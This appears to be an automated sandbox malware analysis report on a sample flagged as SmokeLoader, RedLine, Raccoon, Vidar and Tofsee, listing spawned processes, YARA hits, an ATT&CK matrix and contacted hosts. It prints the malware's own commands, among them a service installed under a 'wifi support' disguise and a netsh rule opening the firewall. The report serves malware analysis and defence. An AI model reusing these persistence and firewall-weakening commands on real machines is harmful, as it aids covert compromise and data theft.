                      Source: 13.2.768F.exe.2c0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 13.0.768F.exe.2c0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 23.0.768F.exe.360000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 23.0.768F.exe.360000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 23.0.768F.exe.360000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeProcess created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: C:\Users\user\AppData\Roaming\adiicvbProcess created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ejdjvovs
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeProcess created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000003.00000000.686439824.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.705495369.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.719849751.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000003.00000000.689892257.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000003.00000000.686591277.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.705756557.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.720529892.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000003.00000000.712554316.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.694076028.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.728928584.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: __EH_prolog,OpenJobObjectA,GetLocaleInfoW,_ftell,_feof,_printf,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\768F.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00408796 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exeCode function: 0_2_00401313 __EH_prolog,CompareFileTime,TerminateThread,GetConsoleAliasesA,FindResourceExW,GetVersionExW,VirtualQuery,CreateRemoteThread,SetComputerNameExA,ClientToScreen,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,WriteConsoleA,GetConsoleTitleW,GetAtomNameW,HeapLock,GetFileAttributesW,GetDefaultCommConfigA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Uses netsh to modify the Windows network and firewall settingsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Modifies the windows firewallShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000000.863779342.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.860675762.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.863199052.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000003.915417310.00000000009D2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.864291175.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.916450384.0000000000C18000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.V91yW08J6p.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.adiicvb.6115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.1.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907355017.0000000002090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907548459.00000000020C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1068850815.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.909618696.0000000002370000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.qxoxlxqh.exe.d70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.6902.exe.600000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.5e0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.d50e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1062344530.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6902.exe PID: 1716, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qxoxlxqh.exe PID: 5788, type: MEMORYSTR
                      Source: Yara matchFile source: 00000025.00000002.1069240289.00000000007B4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1068850815.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.909618696.0000000002370000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.391ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.768F.exe.37df910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000000.863779342.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.860675762.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.863199052.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000003.915417310.00000000009D2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.864291175.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.916450384.0000000000C18000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.V91yW08J6p.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.adiicvb.6115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.1.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907355017.0000000002090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907548459.00000000020C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000008.00000002.809805582.0000000000548000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1068850815.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.909618696.0000000002370000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.qxoxlxqh.exe.d70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.6902.exe.600000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.db0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.5e0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.qxoxlxqh.exe.d50e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840468381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850016785.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.840877989.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850501152.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1062344530.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.850539504.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.846397330.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6902.exe PID: 1716, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: qxoxlxqh.exe PID: 5788, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeCode function: 11_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeCode function: 26_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Spearphishing Link1Native API541DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Valid Accounts1Exploitation for Client Execution1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter2Valid Accounts1Valid Accounts1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution3Windows Service4Access Token Manipulation1Software Packing33NTDSSystem Information Discovery327Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptWindows Service4Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol36Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonProcess Injection713DLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery641VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemVirtualization/Sandbox Evasion331Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion331Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 551101 Sample: V91yW08J6p.exe Startdate: 11/01/2022 Architecture: WINDOWS Score: 100 71 78.46.160.87, 49886, 80 HETZNER-ASDE Germany 2->71 73 api.2ip.ua 77.123.139.190, 443, 49894 VOLIA-ASUA Ukraine 2->73 75 15 other IPs or domains 2->75 91 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->91 93 Antivirus detection for URL or domain 2->93 95 Antivirus detection for dropped file 2->95 97 18 other signatures 2->97 11 V91yW08J6p.exe 2->11         started        14 adiicvb 2->14         started        16 qxoxlxqh.exe 2->16         started        signatures3 process4 signatures5 107 Contains functionality to inject code into remote processes 11->107 109 Injects a PE file into a foreign processes 11->109 18 V91yW08J6p.exe 11->18         started        111 Machine Learning detection for dropped file 14->111 21 adiicvb 14->21         started        113 Detected unpacking (changes PE section rights) 16->113 115 Detected unpacking (overwrites its own PE header) 16->115 117 Writes to foreign memory regions 16->117 119 Allocates memory in foreign processes 16->119 process6 signatures7 83 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->83 85 Maps a DLL or memory area into another process 18->85 87 Checks if the current machine is a virtual machine (disk enumeration) 18->87 23 explorer.exe 10 18->23 injected 89 Creates a thread in another existing process (thread injection) 21->89 process8 dnsIp9 77 host-data-coin-11.com 23->77 79 185.233.81.115, 443, 49800 SUPERSERVERSDATACENTERRU Russian Federation 23->79 81 23 other IPs or domains 23->81 61 C:\Users\user\AppData\Roaming\vsiicvb, PE32 23->61 dropped 63 C:\Users\user\AppData\Roaming\adiicvb, PE32 23->63 dropped 65 C:\Users\user\AppData\Local\Temp\FF1A.exe, PE32 23->65 dropped 67 11 other files (9 malicious) 23->67 dropped 99 System process connects to network (likely due to code injection or exploit) 23->99 101 Benign windows process drops PE files 23->101 103 Deletes itself after installation 23->103 105 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->105 28 6902.exe 2 23->28         started        32 76E7.exe 23->32         started        34 7CCD.exe 23->34         started        36 768F.exe 3 23->36         started        file10 signatures11 process12 file13 69 C:\Users\user\AppData\Local\...\qxoxlxqh.exe, PE32 28->69 dropped 121 Detected unpacking (changes PE section rights) 28->121 123 Detected unpacking 